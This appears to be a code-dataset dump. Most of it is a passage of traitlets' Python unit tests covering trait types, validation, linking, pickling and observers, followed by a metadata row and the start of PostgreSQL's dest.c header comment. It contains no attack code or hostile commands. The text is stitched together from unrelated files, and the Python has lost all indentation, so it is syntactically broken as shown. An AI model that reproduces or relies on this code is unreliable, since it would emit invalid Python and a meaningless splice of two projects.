self.c = c; self.d = d
class A(HasTraits):
inst = Instance(Foo, (10,))
a = A()
self.assertEqual(a.inst.c, 10)
class B(HasTraits):
inst = Instance(Bah, args=(10,), kw=dict(d=20))
b = B()
self.assertEqual(b.inst.c, 10)
self.assertEqual(b.inst.d, 20)
class C(HasTraits):
inst = Instance(Foo, allow_none=True)
c = C()
self.assertTrue(c.inst is None)
def test_bad_default(self):
class Foo(object): pass
class A(HasTraits):
inst = Instance(Foo)
a = A()
with self.assertRaises(TraitError):
a.inst
def test_instance(self):
class Foo(object): pass
def inner():
class A(HasTraits):
inst = Instance(Foo())
self.assertRaises(TraitError, inner)
class TestThis(TestCase):
def test_this_class(self):
class Foo(HasTraits):
this = This()
f = Foo()
self.assertEqual(f.this, None)
g = Foo()
f.this = g
self.assertEqual(f.this, g)
self.assertRaises(TraitError, setattr, f, 'this', 10)
def test_this_inst(self):
class Foo(HasTraits):
this = This()
f = Foo()
f.this = Foo()
self.assertTrue(isinstance(f.this, Foo))
def test_subclass(self):
class Foo(HasTraits):
t = This()
class Bar(Foo):
pass
f = Foo()
b = Bar()
f.t = b
b.t = f
self.assertEqual(f.t, b)
self.assertEqual(b.t, f)
def test_subclass_override(self):
class Foo(HasTraits):
t = This()
class Bar(Foo):
t = This()
f = Foo()
b = Bar()
f.t = b
self.assertEqual(f.t, b)
self.assertRaises(TraitError, setattr, b, 't', f)
def test_this_in_container(self):
class Tree(HasTraits):
value = Unicode()
leaves = List(This())
tree = Tree(
value='foo',
leaves=[Tree(value='bar'), Tree(value='buzz')]
)
with self.assertRaises(TraitError):
tree.leaves = [1, 2]
class TraitTestBase(TestCase):
"""A best testing class for basic trait types."""
def assign(self, value):
self.obj.value = value
def coerce(self, value):
return value
def test_good_values(self):
if hasattr(self, '_good_values'):
for value in self._good_values:
self.assign(value)
self.assertEqual(self.obj.value, self.coerce(value))
def test_bad_values(self):
if hasattr(self, '_bad_values'):
for value in self._bad_values:
try:
self.assertRaises(TraitError, self.assign, value)
except AssertionError:
assert False, value
def test_default_value(self):
if hasattr(self, '_default_value'):
self.assertEqual(self._default_value, self.obj.value)
def test_allow_none(self):
if (hasattr(self, '_bad_values') and hasattr(self, '_good_values') and
None in self._bad_values):
trait=self.obj.traits()['value']
try:
trait.allow_none = True
self._bad_values.remove(None)
#skip coerce. Allow None casts None to None.
self.assign(None)
self.assertEqual(self.obj.value,None)
self.test_good_values()
self.test_bad_values()
finally:
#tear down
trait.allow_none = False
self._bad_values.append(None)
def tearDown(self):
# restore default value after tests, if set
if hasattr(self, '_default_value'):
self.obj.value = self._default_value
class AnyTrait(HasTraits):
value = Any()
class AnyTraitTest(TraitTestBase):
obj = AnyTrait()
_default_value = None
_good_values = [10.0, 'ten', u'ten', [10], {'ten': 10},(10,), None, 1j]
_bad_values = []
class UnionTrait(HasTraits):
value = Union([Type(), Bool()])
class UnionTraitTest(TraitTestBase):
obj = UnionTrait(value='ipython_genutils.ipstruct.Struct')
_good_values = [int, float, True]
_bad_values = [[], (0,), 1j]
class OrTrait(HasTraits):
value = Bool() | Unicode()
class OrTraitTest(TraitTestBase):
obj = OrTrait()
_good_values = [True, False, 'ten']
_bad_values = [[], (0,), 1j]
class IntTrait(HasTraits):
value = Int(99, min=-100)
class TestInt(TraitTestBase):
obj = IntTrait()
_default_value = 99
_good_values = [10, -10]
_bad_values = ['ten', u'ten', [10], {'ten': 10}, (10,), None, 1j,
10.1, -10.1, '10L', '-10L', '10.1', '-10.1', u'10L',
u'-10L', u'10.1', u'-10.1', '10', '-10', u'10', -200]
if not six.PY3:
_bad_values.extend([long(10), long(-10), 10*sys.maxint, -10*sys.maxint])
class CIntTrait(HasTraits):
value = CInt('5')
class TestCInt(TraitTestBase):
obj = CIntTrait()
_default_value = 5
_good_values = ['10', '-10', u'10', u'-10', 10, 10.0, -10.0, 10.1]
_bad_values = ['ten', u'ten', [10], {'ten': 10},(10,),
None, 1j, '10.1', u'10.1']
def coerce(self, n):
return int(n)
class MinBoundCIntTrait(HasTraits):
value = CInt('5', min=3)
class TestMinBoundCInt(TestCInt):
obj = MinBoundCIntTrait()
_default_value = 5
_good_values = [3, 3.0, '3']
_bad_values = [2.6, 2, -3, -3.0]
class LongTrait(HasTraits):
value = Long(99 if six.PY3 else long(99))
class TestLong(TraitTestBase):
obj = LongTrait()
_default_value = 99 if six.PY3 else long(99)
_good_values = [10, -10]
_bad_values = ['ten', u'ten', [10], {'ten': 10},(10,),
None, 1j, 10.1, -10.1, '10', '-10', '10L', '-10L', '10.1',
'-10.1', u'10', u'-10', u'10L', u'-10L', u'10.1',
u'-10.1']
if not six.PY3:
# maxint undefined on py3, because int == long
_good_values.extend([long(10), long(-10), 10*sys.maxint, -10*sys.maxint])
_bad_values.extend([[long(10)], (long(10),)])
@mark.skipif(six.PY3, reason="not relevant on py3")
def test_cast_small(self):
"""Long casts ints to long"""
self.obj.value = 10
self.assertEqual(type(self.obj.value), long)
class MinBoundLongTrait(HasTraits):
value = Long(99 if six.PY3 else long(99), min=5)
class TestMinBoundLong(TraitTestBase):
obj = MinBoundLongTrait()
_default_value = 99 if six.PY3 else long(99)
_good_values = [5, 10]
_bad_values = [4, -10]
class MaxBoundLongTrait(HasTraits):
value = Long(5 if six.PY3 else long(5), max=10)
class TestMaxBoundLong(TraitTestBase):
obj = MaxBoundLongTrait()
_default_value = 5 if six.PY3 else long(5)
_good_values = [10, -2]
_bad_values = [11, 20]
class CLongTrait(HasTraits):
value = CLong('5')
class TestCLong(TraitTestBase):
obj = CLongTrait()
_default_value = 5 if six.PY3 else long(5)
_good_values = ['10', '-10', u'10', u'-10', 10, 10.0, -10.0, 10.1]
_bad_values = ['ten', u'ten', [10], {'ten': 10},(10,),
None, 1j, '10.1', u'10.1']
def coerce(self, n):
return int(n) if six.PY3 else long(n)
class MaxBoundCLongTrait(HasTraits):
value = CLong('5', max=10)
class TestMaxBoundCLong(TestCLong):
obj = MaxBoundCLongTrait()
_default_value = 5 if six.PY3 else long(5)
_good_values = [10, '10', 10.3]
_bad_values = [11.0, '11']
class IntegerTrait(HasTraits):
value = Integer(1)
class TestInteger(TestLong):
obj = IntegerTrait()
_default_value = 1
def coerce(self, n):
return int(n)
@mark.skipif(six.PY3, reason="not relevant on py3")
def test_cast_small(self):
"""Integer casts small longs to int"""
self.obj.value = long(100)
self.assertEqual(type(self.obj.value), int)
class MinBoundIntegerTrait(HasTraits):
value = Integer(5, min=3)
class TestMinBoundInteger(TraitTestBase):
obj = MinBoundIntegerTrait()
_default_value = 5
_good_values = 3, 20
_bad_values = [2, -10]
class MaxBoundIntegerTrait(HasTraits):
value = Integer(1, max=3)
class TestMaxBoundInteger(TraitTestBase):
obj = MaxBoundIntegerTrait()
_default_value = 1
_good_values = 3, -2
_bad_values = [4, 10]
class FloatTrait(HasTraits):
value = Float(99.0, max=200.0)
class TestFloat(TraitTestBase):
obj = FloatTrait()
_default_value = 99.0
_good_values = [10, -10, 10.1, -10.1]
_bad_values = ['ten', u'ten', [10], {'ten': 10}, (10,), None,
1j, '10', '-10', '10L', '-10L', '10.1', '-10.1', u'10',
u'-10', u'10L', u'-10L', u'10.1', u'-10.1', 201.0]
if not six.PY3:
_bad_values.extend([long(10), long(-10)])
class CFloatTrait(HasTraits):
value = CFloat('99.0', max=200.0)
class TestCFloat(TraitTestBase):
obj = CFloatTrait()
_default_value = 99.0
_good_values = [10, 10.0, 10.5, '10.0', '10', '-10', '10.0', u'10']
_bad_values = ['ten', u'ten', [10], {'ten': 10}, (10,), None, 1j,
200.1, '200.1']
def coerce(self, v):
return float(v)
class ComplexTrait(HasTraits):
value = Complex(99.0-99.0j)
class TestComplex(TraitTestBase):
obj = ComplexTrait()
_default_value = 99.0-99.0j
_good_values = [10, -10, 10.1, -10.1, 10j, 10+10j, 10-10j,
10.1j, 10.1+10.1j, 10.1-10.1j]
_bad_values = [u'10L', u'-10L', 'ten', [10], {'ten': 10},(10,), None]
if not six.PY3:
_bad_values.extend([long(10), long(-10)])
class BytesTrait(HasTraits):
value = Bytes(b'string')
class TestBytes(TraitTestBase):
obj = BytesTrait()
_default_value = b'string'
_good_values = [b'10', b'-10', b'10L',
b'-10L', b'10.1', b'-10.1', b'string']
_bad_values = [10, -10, 10.1, -10.1, 1j, [10],
['ten'],{'ten': 10},(10,), None, u'string']
if not six.PY3:
_bad_values.extend([long(10), long(-10)])
class UnicodeTrait(HasTraits):
value = Unicode(u'unicode')
class TestUnicode(TraitTestBase):
obj = UnicodeTrait()
_default_value = u'unicode'
_good_values = ['10', '-10', '10L', '-10L', '10.1',
'-10.1', '', u'', 'string', u'string', u"€"]
_bad_values = [10, -10, 10.1, -10.1, 1j,
[10], ['ten'], [u'ten'], {'ten': 10},(10,), None]
if not six.PY3:
_bad_values.extend([long(10), long(-10)])
class ObjectNameTrait(HasTraits):
value = ObjectName("abc")
class TestObjectName(TraitTestBase):
obj = ObjectNameTrait()
_default_value = "abc"
_good_values = ["a", "gh", "g9", "g_", "_G", u"a345_"]
_bad_values = [1, "", u"€", "9g", "!", "#abc", "aj@", "a.b", "a()", "a[0]",
None, object(), object]
if sys.version_info[0] < 3:
_bad_values.append(u"þ")
else:
_good_values.append(u"þ") # þ=1 is valid in Python 3 (PEP 3131).
class DottedObjectNameTrait(HasTraits):
value = DottedObjectName("a.b")
class TestDottedObjectName(TraitTestBase):
obj = DottedObjectNameTrait()
_default_value = "a.b"
_good_values = ["A", "y.t", "y765.__repr__", "os.path.join", u"os.path.join"]
_bad_values = [1, u"abc.€", "_.@", ".", ".abc", "abc.", ".abc.", None]
if sys.version_info[0] < 3:
_bad_values.append(u"t.þ")
else:
_good_values.append(u"t.þ")
class TCPAddressTrait(HasTraits):
value = TCPAddress()
class TestTCPAddress(TraitTestBase):
obj = TCPAddressTrait()
_default_value = ('127.0.0.1',0)
_good_values = [('localhost',0),('192.168.0.1',1000),('www.google.com',80)]
_bad_values = [(0,0),('localhost',10.0),('localhost',-1), None]
class ListTrait(HasTraits):
value = List(Int())
class TestList(TraitTestBase):
obj = ListTrait()
_default_value = []
_good_values = [[], [1], list(range(10)), (1,2)]
_bad_values = [10, [1,'a'], 'a']
def coerce(self, value):
if value is not None:
value = list(value)
return value
class Foo(object):
pass
class NoneInstanceListTrait(HasTraits):
value = List(Instance(Foo))
class TestNoneInstanceList(TraitTestBase):
obj = NoneInstanceListTrait()
_default_value = []
_good_values = [[Foo(), Foo()], []]
_bad_values = [[None], [Foo(), None]]
class InstanceListTrait(HasTraits):
value = List(Instance(__name__+'.Foo'))
class TestInstanceList(TraitTestBase):
obj = InstanceListTrait()
def test_klass(self):
"""Test that the instance klass is properly assigned."""
self.assertIs(self.obj.traits()['value']._trait.klass, Foo)
_default_value = []
_good_values = [[Foo(), Foo()], []]
_bad_values = [['1', 2,], '1', [Foo], None]
class UnionListTrait(HasTraits):
value = List(Int() | Bool())
class TestUnionListTrait(HasTraits):
obj = UnionListTrait()
_default_value = []
_good_values = [[True, 1], [False, True]]
_bad_values = [[1, 'True'], False]
class LenListTrait(HasTraits):
value = List(Int(), [0], minlen=1, maxlen=2)
class TestLenList(TraitTestBase):
obj = LenListTrait()
_default_value = [0]
_good_values = [[1], [1,2], (1,2)]
_bad_values = [10, [1,'a'], 'a', [], list(range(3))]
def coerce(self, value):
if value is not None:
value = list(value)
return value
class TupleTrait(HasTraits):
value = Tuple(Int(allow_none=True), default_value=(1,))
class TestTupleTrait(TraitTestBase):
obj = TupleTrait()
_default_value = (1,)
_good_values = [(1,), (0,), [1]]
_bad_values = [10, (1, 2), ('a'), (), None]
def coerce(self, value):
if value is not None:
value = tuple(value)
return value
def test_invalid_args(self):
self.assertRaises(TypeError, Tuple, 5)
self.assertRaises(TypeError, Tuple, default_value='hello')
t = Tuple(Int(), CBytes(), default_value=(1,5))
class LooseTupleTrait(HasTraits):
value = Tuple((1,2,3))
class TestLooseTupleTrait(TraitTestBase):
obj = LooseTupleTrait()
_default_value = (1,2,3)
_good_values = [(1,), [1], (0,), tuple(range(5)), tuple('hello'), ('a',5), ()]
_bad_values = [10, 'hello', {}, None]
def coerce(self, value):
if value is not None:
value = tuple(value)
return value
def test_invalid_args(self):
self.assertRaises(TypeError, Tuple, 5)
self.assertRaises(TypeError, Tuple, default_value='hello')
t = Tuple(Int(), CBytes(), default_value=(1,5))
class MultiTupleTrait(HasTraits):
value = Tuple(Int(), Bytes(), default_value=[99,b'bottles'])
class TestMultiTuple(TraitTestBase):
obj = MultiTupleTrait()
_default_value = (99,b'bottles')
_good_values = [(1,b'a'), (2,b'b')]
_bad_values = ((),10, b'a', (1,b'a',3), (b'a',1), (1, u'a'))
class CRegExpTrait(HasTraits):
value = CRegExp(r'')
class TestCRegExp(TraitTestBase):
def coerce(self, value):
return re.compile(value)
obj = CRegExpTrait()
_default_value = re.compile(r'')
_good_values = [r'\d+', re.compile(r'\d+')]
_bad_values = ['(', None, ()]
class DictTrait(HasTraits):
value = Dict()
def test_dict_assignment():
d = dict()
c = DictTrait()
c.value = d
d['a'] = 5
assert d == c.value
assert c.value is d
class UniformlyValidatedDictTrait(HasTraits):
value = Dict(trait=Unicode(),
default_value={'foo': '1'})
class TestInstanceUniformlyValidatedDict(TraitTestBase):
obj = UniformlyValidatedDictTrait()
_default_value = {'foo': '1'}
_good_values = [{'foo': '0', 'bar': '1'}]
_bad_values = [{'foo': 0, 'bar': '1'}]
class KeyValidatedDictTrait(HasTraits):
value = Dict(traits={'foo': Int()},
default_value={'foo': 1})
class TestInstanceKeyValidatedDict(TraitTestBase):
obj = KeyValidatedDictTrait()
_default_value = {'foo': 1}
_good_values = [{'foo': 0, 'bar': '1'}, {'foo': 0, 'bar': 1}]
_bad_values = [{'foo': '0', 'bar': '1'}]
class FullyValidatedDictTrait(HasTraits):
value = Dict(trait=Unicode(),
traits={'foo': Int()},
default_value={'foo': 1})
class TestInstanceFullyValidatedDict(TraitTestBase):
obj = FullyValidatedDictTrait()
_default_value = {'foo': 1}
_good_values = [{'foo': 0, 'bar': '1'}, {'foo': 1, 'bar': '2'}]
_bad_values = [{'foo': 0, 'bar': 1}, {'foo': '0', 'bar': '1'}]
def test_dict_default_value():
"""Check that the `{}` default value of the Dict traitlet constructor is
actually copied."""
class Foo(HasTraits):
d1 = Dict()
d2 = Dict()
foo = Foo()
assert foo.d1 == {}
assert foo.d2 == {}
assert foo.d1 is not foo.d2
class TestValidationHook(TestCase):
def test_parity_trait(self):
"""Verify that the early validation hook is effective"""
class Parity(HasTraits):
value = Int(0)
parity = Enum(['odd', 'even'], default_value='even')
@validate('value')
def _value_validate(self, proposal):
value = proposal['value']
if self.parity == 'even' and value % 2:
raise TraitError('Expected an even number')
if self.parity == 'odd' and (value % 2 == 0):
raise TraitError('Expected an odd number')
return value
u = Parity()
u.parity = 'odd'
u.value = 1 # OK
with self.assertRaises(TraitError):
u.value = 2 # Trait Error
u.parity = 'even'
u.value = 2 # OK
def test_multiple_validate(self):
"""Verify that we can register the same validator to multiple names"""
class OddEven(HasTraits):
odd = Int(1)
even = Int(0)
@validate('odd', 'even')
def check_valid(self, proposal):
if proposal['trait'].name == 'odd' and not proposal['value'] % 2:
raise TraitError('odd should be odd')
if proposal['trait'].name == 'even' and proposal['value'] % 2:
raise TraitError('even should be even')
u = OddEven()
u.odd = 3 # OK
with self.assertRaises(TraitError):
u.odd = 2 # Trait Error
u.even = 2 # OK
with self.assertRaises(TraitError):
u.even = 3 # Trait Error
class TestLink(TestCase):
def test_connect_same(self):
"""Verify two traitlets of the same type can be linked together using link."""
# Create two simple classes with Int traitlets.
class A(HasTraits):
value = Int()
a = A(value=9)
b = A(value=8)
# Conenct the two classes.
c = link((a, 'value'), (b, 'value'))
# Make sure the values are the same at the point of linking.
self.assertEqual(a.value, b.value)
# Change one of the values to make sure they stay in sync.
a.value = 5
self.assertEqual(a.value, b.value)
b.value = 6
self.assertEqual(a.value, b.value)
def test_link_different(self):
"""Verify two traitlets of different types can be linked together using link."""
# Create two simple classes with Int traitlets.
class A(HasTraits):
value = Int()
class B(HasTraits):
count = Int()
a = A(value=9)
b = B(count=8)
# Conenct the two classes.
c = link((a, 'value'), (b, 'count'))
# Make sure the values are the same at the point of linking.
self.assertEqual(a.value, b.count)
# Change one of the values to make sure they stay in sync.
a.value = 5
self.assertEqual(a.value, b.count)
b.count = 4
self.assertEqual(a.value, b.count)
def test_unlink(self):
"""Verify two linked traitlets can be unlinked."""
# Create two simple classes with Int traitlets.
class A(HasTraits):
value = Int()
a = A(value=9)
b = A(value=8)
# Connect the two classes.
c = link((a, 'value'), (b, 'value'))
a.value = 4
c.unlink()
# Change one of the values to make sure they don't stay in sync.
a.value = 5
self.assertNotEqual(a.value, b.value)
def test_callbacks(self):
"""Verify two linked traitlets have their callbacks called once."""
# Create two simple classes with Int traitlets.
class A(HasTraits):
value = Int()
class B(HasTraits):
count = Int()
a = A(value=9)
b = B(count=8)
# Register callbacks that count.
callback_count = []
def a_callback(name, old, new):
callback_count.append('a')
a.on_trait_change(a_callback, 'value')
def b_callback(name, old, new):
callback_count.append('b')
b.on_trait_change(b_callback, 'count')
# Connect the two classes.
c = link((a, 'value'), (b, 'count'))
# Make sure b's count was set to a's value once.
self.assertEqual(''.join(callback_count), 'b')
del callback_count[:]
# Make sure a's value was set to b's count once.
b.count = 5
self.assertEqual(''.join(callback_count), 'ba')
del callback_count[:]
# Make sure b's count was set to a's value once.
a.value = 4
self.assertEqual(''.join(callback_count), 'ab')
del callback_count[:]
class TestDirectionalLink(TestCase):
def test_connect_same(self):
"""Verify two traitlets of the same type can be linked together using directional_link."""
# Create two simple classes with Int traitlets.
class A(HasTraits):
value = Int()
a = A(value=9)
b = A(value=8)
# Conenct the two classes.
c = directional_link((a, 'value'), (b, 'value'))
# Make sure the values are the same at the point of linking.
self.assertEqual(a.value, b.value)
# Change one the value of the source and check that it synchronizes the target.
a.value = 5
self.assertEqual(b.value, 5)
# Change one the value of the target and check that it has no impact on the source
b.value = 6
self.assertEqual(a.value, 5)
def test_tranform(self):
"""Test transform link."""
# Create two simple classes with Int traitlets.
class A(HasTraits):
value = Int()
a = A(value=9)
b = A(value=8)
# Conenct the two classes.
c = directional_link((a, 'value'), (b, 'value'), lambda x: 2 * x)
# Make sure the values are correct at the point of linking.
self.assertEqual(b.value, 2 * a.value)
# Change one the value of the source and check that it modifies the target.
a.value = 5
self.assertEqual(b.value, 10)
# Change one the value of the target and check that it has no impact on the source
b.value = 6
self.assertEqual(a.value, 5)
def test_link_different(self):
"""Verify two traitlets of different types can be linked together using link."""
# Create two simple classes with Int traitlets.
class A(HasTraits):
value = Int()
class B(HasTraits):
count = Int()
a = A(value=9)
b = B(count=8)
# Conenct the two classes.
c = directional_link((a, 'value'), (b, 'count'))
# Make sure the values are the same at the point of linking.
self.assertEqual(a.value, b.count)
# Change one the value of the source and check that it synchronizes the target.
a.value = 5
self.assertEqual(b.count, 5)
# Change one the value of the target and check that it has no impact on the source
b.value = 6
self.assertEqual(a.value, 5)
def test_unlink(self):
"""Verify two linked traitlets can be unlinked."""
# Create two simple classes with Int traitlets.
class A(HasTraits):
value = Int()
a = A(value=9)
b = A(value=8)
# Connect the two classes.
c = directional_link((a, 'value'), (b, 'value'))
a.value = 4
c.unlink()
# Change one of the values to make sure they don't stay in sync.
a.value = 5
self.assertNotEqual(a.value, b.value)
class Pickleable(HasTraits):
i = Int()
@observe('i')
def _i_changed(self, change): pass
@validate('i')
def _i_validate(self, commit):
return commit['value']
j = Int()
def __init__(self):
with self.hold_trait_notifications():
self.i = 1
self.on_trait_change(self._i_changed, 'i')
def test_pickle_hastraits():
c = Pickleable()
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
p = pickle.dumps(c, protocol)
c2 = pickle.loads(p)
assert c2.i == c.i
assert c2.j == c.j
c.i = 5
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
p = pickle.dumps(c, protocol)
c2 = pickle.loads(p)
assert c2.i == c.i
assert c2.j == c.j
def test_hold_trait_notifications():
changes = []
class Test(HasTraits):
a = Integer(0)
b = Integer(0)
def _a_changed(self, name, old, new):
changes.append((old, new))
def _b_validate(self, value, trait):
if value != 0:
raise TraitError('Only 0 is a valid value')
return value
# Test context manager and nesting
t = Test()
with t.hold_trait_notifications():
with t.hold_trait_notifications():
t.a = 1
assert t.a == 1
assert changes == []
t.a = 2
assert t.a == 2
with t.hold_trait_notifications():
t.a = 3
assert t.a == 3
assert changes == []
t.a = 4
assert t.a == 4
assert changes == []
t.a = 4
assert t.a == 4
assert changes == []
assert changes == [(0, 4)]
# Test roll-back
try:
with t.hold_trait_notifications():
t.b = 1 # raises a Trait error
except:
pass
assert t.b == 0
class RollBack(HasTraits):
bar = Int()
def _bar_validate(self, value, trait):
if value:
raise TraitError('foobar')
return value
class TestRollback(TestCase):
def test_roll_back(self):
def assign_rollback():
RollBack(bar=1)
self.assertRaises(TraitError, assign_rollback)
class CacheModification(HasTraits):
foo = Int()
bar = Int()
def _bar_validate(self, value, trait):
self.foo = value
return value
def _foo_validate(self, value, trait):
self.bar = value
return value
def test_cache_modification():
CacheModification(foo=1)
CacheModification(bar=1)
class OrderTraits(HasTraits):
notified = Dict()
a = Unicode()
b = Unicode()
c = Unicode()
d = Unicode()
e = Unicode()
f = Unicode()
g = Unicode()
h = Unicode()
i = Unicode()
j = Unicode()
k = Unicode()
l = Unicode()
def _notify(self, name, old, new):
"""check the value of all traits when each trait change is triggered
This verifies that the values are not sensitive
to dict ordering when loaded from kwargs
"""
# check the value of the other traits
# when a given trait change notification fires
self.notified[name] = {
c: getattr(self, c) for c in 'abcdefghijkl'
}
def __init__(self, **kwargs):
self.on_trait_change(self._notify)
super(OrderTraits, self).__init__(**kwargs)
def test_notification_order():
d = {c:c for c in 'abcdefghijkl'}
obj = OrderTraits()
assert obj.notified == {}
obj = OrderTraits(**d)
notifications = {
c: d for c in 'abcdefghijkl'
}
assert obj.notified == notifications
###
# Traits for Forward Declaration Tests
###
class ForwardDeclaredInstanceTrait(HasTraits):
value = ForwardDeclaredInstance('ForwardDeclaredBar', allow_none=True)
class ForwardDeclaredTypeTrait(HasTraits):
value = ForwardDeclaredType('ForwardDeclaredBar', allow_none=True)
class ForwardDeclaredInstanceListTrait(HasTraits):
value = List(ForwardDeclaredInstance('ForwardDeclaredBar'))
class ForwardDeclaredTypeListTrait(HasTraits):
value = List(ForwardDeclaredType('ForwardDeclaredBar'))
###
# End Traits for Forward Declaration Tests
###
###
# Classes for Forward Declaration Tests
###
class ForwardDeclaredBar(object):
pass
class ForwardDeclaredBarSub(ForwardDeclaredBar):
pass
###
# End Classes for Forward Declaration Tests
###
###
# Forward Declaration Tests
###
class TestForwardDeclaredInstanceTrait(TraitTestBase):
obj = ForwardDeclaredInstanceTrait()
_default_value = None
_good_values = [None, ForwardDeclaredBar(), ForwardDeclaredBarSub()]
_bad_values = ['foo', 3, ForwardDeclaredBar, ForwardDeclaredBarSub]
class TestForwardDeclaredTypeTrait(TraitTestBase):
obj = ForwardDeclaredTypeTrait()
_default_value = None
_good_values = [None, ForwardDeclaredBar, ForwardDeclaredBarSub]
_bad_values = ['foo', 3, ForwardDeclaredBar(), ForwardDeclaredBarSub()]
class TestForwardDeclaredInstanceList(TraitTestBase):
obj = ForwardDeclaredInstanceListTrait()
def test_klass(self):
"""Test that the instance klass is properly assigned."""
self.assertIs(self.obj.traits()['value']._trait.klass, ForwardDeclaredBar)
_default_value = []
_good_values = [
[ForwardDeclaredBar(), ForwardDeclaredBarSub()],
[],
]
_bad_values = [
ForwardDeclaredBar(),
[ForwardDeclaredBar(), 3, None],
'1',
# Note that this is the type, not an instance.
[ForwardDeclaredBar],
[None],
None,
]
class TestForwardDeclaredTypeList(TraitTestBase):
obj = ForwardDeclaredTypeListTrait()
def test_klass(self):
"""Test that the instance klass is properly assigned."""
self.assertIs(self.obj.traits()['value']._trait.klass, ForwardDeclaredBar)
_default_value = []
_good_values = [
[ForwardDeclaredBar, ForwardDeclaredBarSub],
[],
]
_bad_values = [
ForwardDeclaredBar,
[ForwardDeclaredBar, 3],
'1',
# Note that this is an instance, not the type.
[ForwardDeclaredBar()],
[None],
None,
]
###
# End Forward Declaration Tests
###
class TestDynamicTraits(TestCase):
def setUp(self):
self._notify1 = []
def notify1(self, name, old, new):
self._notify1.append((name, old, new))
def test_notify_all(self):
class A(HasTraits):
pass
a = A()
self.assertTrue(not hasattr(a, 'x'))
self.assertTrue(not hasattr(a, 'y'))
# Dynamically add trait x.
a.add_traits(x=Int())
self.assertTrue(hasattr(a, 'x'))
self.assertTrue(isinstance(a, (A, )))
# Dynamically add trait y.
a.add_traits(y=Float())
self.assertTrue(hasattr(a, 'y'))
self.assertTrue(isinstance(a, (A, )))
self.assertEqual(a.__class__.__name__, A.__name__)
# Create a new instance and verify that x and y
# aren't defined.
b = A()
self.assertTrue(not hasattr(b, 'x'))
self.assertTrue(not hasattr(b, 'y'))
# Verify that notification works like normal.
a.on_trait_change(self.notify1)
a.x = 0
self.assertEqual(len(self._notify1), 0)
a.y = 0.0
self.assertEqual(len(self._notify1), 0)
a.x = 10
self.assertTrue(('x', 0, 10) in self._notify1)
a.y = 10.0
self.assertTrue(('y', 0.0, 10.0) in self._notify1)
self.assertRaises(TraitError, setattr, a, 'x', 'bad string')
self.assertRaises(TraitError, setattr, a, 'y', 'bad string')
self._notify1 = []
a.on_trait_change(self.notify1, remove=True)
a.x = 20
a.y = 20.0
self.assertEqual(len(self._notify1), 0)
def test_enum_no_default():
class C(HasTraits):
t = Enum(['a', 'b'])
c = C()
c.t = 'a'
assert c.t == 'a'
c = C()
with pytest.raises(TraitError):
t = c.t
c = C(t='b')
assert c.t == 'b'
def test_default_value_repr():
class C(HasTraits):
t = Type('traitlets.HasTraits')
t2 = Type(HasTraits)
n = Integer(0)
lis = List()
d = Dict()
assert C.t.default_value_repr() == "'traitlets.HasTraits'"
assert C.t2.default_value_repr() == "'traitlets.traitlets.HasTraits'"
assert C.n.default_value_repr() == '0'
assert C.lis.default_value_repr() == '[]'
assert C.d.default_value_repr() == '{}'
class TransitionalClass(HasTraits):
d = Any()
@default('d')
def _d_default(self):
return TransitionalClass
parent_super = False
calls_super = Integer(0)
@default('calls_super')
def _calls_super_default(self):
return -1
@observe('calls_super')
@observe_compat
def _calls_super_changed(self, change):
self.parent_super = change
parent_override = False
overrides = Integer(0)
@observe('overrides')
@observe_compat
def _overrides_changed(self, change):
self.parent_override = change
class SubClass(TransitionalClass):
def _d_default(self):
return SubClass
subclass_super = False
def _calls_super_changed(self, name, old, new):
self.subclass_super = True
super(SubClass, self)._calls_super_changed(name, old, new)
subclass_override = False
def _overrides_changed(self, name, old, new):
self.subclass_override = True
def test_subclass_compat():
obj = SubClass()
obj.calls_super = 5
assert obj.parent_super
assert obj.subclass_super
obj.overrides = 5
assert obj.subclass_override
assert not obj.parent_override
assert obj.d is SubClass
class DefinesHandler(HasTraits):
parent_called = False
trait = Integer()
@observe('trait')
def handler(self, change):
self.parent_called = True
class OverridesHandler(DefinesHandler):
child_called = False
@observe('trait')
def handler(self, change):
self.child_called = True
def test_subclass_override_observer():
obj = OverridesHandler()
obj.trait = 5
assert obj.child_called
assert not obj.parent_called
class DoesntRegisterHandler(DefinesHandler):
child_called = False
def handler(self, change):
self.child_called = True
def test_subclass_override_not_registered():
"""Subclass that overrides observer and doesn't re-register unregisters both"""
obj = DoesntRegisterHandler()
obj.trait = 5
assert not obj.child_called
assert not obj.parent_called
class AddsHandler(DefinesHandler):
child_called = False
@observe('trait')
def child_handler(self, change):
self.child_called = True
def test_subclass_add_observer():
obj = AddsHandler()
obj.trait = 5
assert obj.child_called
assert obj.parent_called
def test_observe_iterables():
class C(HasTraits):
i = Integer()
s = Unicode()
c = C()
recorded = {}
def record(change):
recorded['change'] = change
# observe with names=set
c.observe(record, names={'i', 's'})
c.i = 5
assert recorded['change'].name == 'i'
assert recorded['change'].new == 5
c.s = 'hi'
assert recorded['change'].name == 's'
assert recorded['change'].new == 'hi'
# observe with names=custom container with iter, contains
class MyContainer(object):
def __init__(self, container):
self.container = container
def __iter__(self):
return iter(self.container)
def __contains__(self, key):
return key in self.container
c.observe(record, names=MyContainer({'i', 's'}))
c.i = 10
assert recorded['change'].name == 'i'
assert recorded['change'].new == 10
c.s = 'ok'
assert recorded['change'].name == 's'
assert recorded['change'].new == 'ok'
def test_super_args():
class SuperRecorder(object):
def __init__(self, *args, **kwargs):
self.super_args = args
self.super_kwargs = kwargs
class SuperHasTraits(HasTraits, SuperRecorder):
i = Integer()
obj = SuperHasTraits('a1', 'a2', b=10, i=5, c='x')
assert obj.i == 5
assert not hasattr(obj, 'b')
assert not hasattr(obj, 'c')
assert obj.super_args == ('a1' , 'a2')
assert obj.super_kwargs == {'b': 10 , 'c': 'x'}
def test_super_bad_args():
class SuperHasTraits(HasTraits):
a = Integer()
if sys.version_info < (3,):
# Legacy Python, object.__init__ warns itself, instead of raising
w = ['object.__init__']
else:
w = ["Passing unrecoginized arguments"]
with expected_warnings(w):
obj = SuperHasTraits(a=1, b=2)
assert obj.a == 1
assert not hasattr(obj, 'b') | unknown | codeparrot/codeparrot-clean | ||
/*-------------------------------------------------------------------------
*
* dest.c
* support for communication destinations
*
*
* Portions Copyright (c) 1996-2026, PostgreSQL Global Development Group
* Portions Copyright (c) 1994, Regents of the University of California
*
* IDENTIFICATION
* src/backend/tcop/dest.c
*
*-------------------------------------------------------------------------
*/
/*
* INTERFACE ROUTINES
* BeginCommand - initialize the destination at start of command
* CreateDestReceiver - create tuple receiver object for destination
* EndCommand - clean up the destination at end of command
* NullCommand - tell dest that an empty query string was recognized
